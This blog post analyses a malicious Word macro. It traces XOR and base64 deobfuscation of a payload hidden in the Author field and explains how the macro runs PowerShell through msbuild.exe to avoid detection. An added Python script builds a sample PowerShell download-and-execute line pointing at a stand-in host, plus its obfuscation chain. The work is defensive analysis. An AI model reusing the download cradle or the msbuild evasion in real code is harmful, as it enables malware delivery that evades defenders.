MALICIOUS OFFICE DOCUMENT ANALYSIS

Alparslan Akyıldız academy
4 min read · Mar 29, 2021

In this blog post I analyze a malicious Word document and use deobfuscation and decoding methods to analyze the malicious PowerShell code it carries. First I ran the olevba tool on REMnux. When we extract the macro code from the file, the first thing we recognize is a base64 decoder function, which suggests that the adversary encoded the malicious code with base64.

I continued the analysis by investigating the macro code. As the output of the hack function shows, the Author property of the file is assigned to the author variable. This is important, because in the analysis step we will extract that part of the file. Another line of the macro writes the obfuscated and decoded code to test.xml, so we can expect to see that behaviour during dynamic analysis.

Another piece of the code is the XOR deobfuscation routine, which is called from a different function, but I could not find the XOR key in the code.

After the XOR decoding step, the newly decoded string is assigned to the author variable, the base64 decoding function is called on it, and the result is written to msbuild_stager.xml.

At the end of the macro the Shell function is called, and the PowerShell code that resides in msbuild_stager.xml is executed with msbuild.exe. The specimen uses .NET to run the PowerShell code (msbuild.exe builds and runs the code in the project file) so that no powershell.exe process is ever spawned. Because the PowerShell code runs inside MSBuild's own .NET process, detections that key on the powershell.exe process name miss it; a defender should instead look for msbuild.exe being launched by winword.exe, or for msbuild.exe loading System.Management.Automation.dll.

Continuing with olevba, it reports some IOCs, but we have already identified them:

Now it's time to use exiftool to retrieve the Author property of the file:

As we can see, the Author field is obfuscated. It is not base64 encoding, but it is very likely an XOR-obfuscated string.

When I display the content of the xobfuscated.txt file, nothing recognizable about the malicious code is visible.

I tried brxor to deobfuscate the string but could not obtain anything, so I then tried bbcrack.

I examined some of the candidate outputs: parts of the string deobfuscate correctly, but not the entire string. I also displayed the candidate with the highest score, but it is still not right. Partial recovery like this usually means the tool's key guesses do not cover the key the sample actually used, so a custom brute force is the next step.

I wrote a small Python script for XOR (the same operation obfuscates and deobfuscates) and decided to brute-force the key.

Then I created a bash loop to drive the brute force, and prepared wordlists containing single alphabetic characters, digits, and two-character combinations. I started with the alphabetic characters like this:

This produced base64 text, so the base64-encoded payload can be extracted from the malicious file:

I used the base64dump tool to extract and decode the encoded string.

Decoding the string revealed gzip-compressed data, recognizable because the base64 text starts with H4sI (the base64 encoding of the gzip magic bytes 1f 8b 08). Now I need to decompress it.
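The three steps above (XOR brute force with a short key, base64 decode, gzip inflate) chained together, as an added example that is not the post's own script. The sample payload, the two-byte key k7 and the URL in it are constructed for the demonstration and are not from the specimen; candidate keys are ranked by how base64-like their output is, and each candidate is then validated by checking for the gzip magic after base64 decoding, which rejects look-alike keys that only flip letter case.

```python
"""
Added example (not from the original post): XOR brute force of a short-key
obfuscated string, followed by base64 decoding and gzip inflation.
"""
import base64
import gzip
import itertools
import string
import zlib

# Bytes a valid base64 string may contain ('=' only as padding).
B64_ALPHABET = frozenset((string.ascii_letters + string.digits + "+/=").encode())
GZIP_MAGIC = b"\x1f\x8b"  # base64-encodes to the "H4sI" prefix mentioned in the post
DEFAULT_CHARSET = (string.ascii_letters + string.digits).encode()


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key; the same call obfuscates and deobfuscates."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def b64_score(candidate: bytes) -> float:
    """Fraction of bytes that fall inside the base64 alphabet (0.0 .. 1.0)."""
    if not candidate:
        return 0.0
    return sum(b in B64_ALPHABET for b in candidate) / len(candidate)


def rank_xor_keys(blob: bytes, max_key_len: int = 2, charset: bytes = DEFAULT_CHARSET):
    """Try every key of length 1..max_key_len over charset (the post used single
    letters, digits and two-character combinations) and return a list of
    (score, key, plaintext) tuples, best score first."""
    results = []
    for klen in range(1, max_key_len + 1):
        for key in itertools.product(charset, repeat=klen):
            key = bytes(key)
            out = xor_bytes(blob, key)
            results.append((b64_score(out), key, out))
    results.sort(key=lambda r: r[0], reverse=True)
    return results


def inflate_if_gzip(b64_text: bytes):
    """Strict base64 decode; return the gunzipped payload, or None if the
    decoded bytes are not a gzip stream."""
    try:
        raw = base64.b64decode(b64_text, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    if not raw.startswith(GZIP_MAGIC):
        return None
    try:
        return gzip.decompress(raw)
    except (OSError, EOFError, zlib.error):
        return None


def recover_payload(blob: bytes, max_key_len: int = 2):
    """Full chain: XOR brute force -> base64 -> gzip. Returns (key, payload) or
    (None, None). Candidates are tried best score first; a wrong key that still
    looks base64-like (e.g. one differing by 0x20, which only swaps letter case)
    is rejected because its decode does not start with the gzip magic."""
    for score, key, text in rank_xor_keys(blob, max_key_len):
        if score < 0.95:
            break
        payload = inflate_if_gzip(text)
        if payload is not None:
            return key, payload
    return None, None


# --- constructed sample input (not a real specimen) ---------------------------
SAMPLE_PS = b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
SAMPLE_KEY = b"k7"  # assumed two-byte key, chosen for the demo
# Build the blob the way the macro's author would: gzip -> base64 -> XOR.
SAMPLE_BLOB = xor_bytes(base64.b64encode(gzip.compress(SAMPLE_PS, mtime=0)), SAMPLE_KEY)

if __name__ == "__main__":
    key, payload = recover_payload(SAMPLE_BLOB)
    print("key:", key)
    print("payload:", payload.decode())
```

For a real sample, replace SAMPLE_BLOB with the bytes pulled from the Author field and raise max_key_len if no candidate scores near 1.0; the search space grows as 62^n, so it is worth trying the short keys first, exactly as the post's wordlists do.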

That gives us the PowerShell code. The URL in it can be used as an IOC, and the code can be debugged step by step in PowerShell ISE.

Thank you for reading.
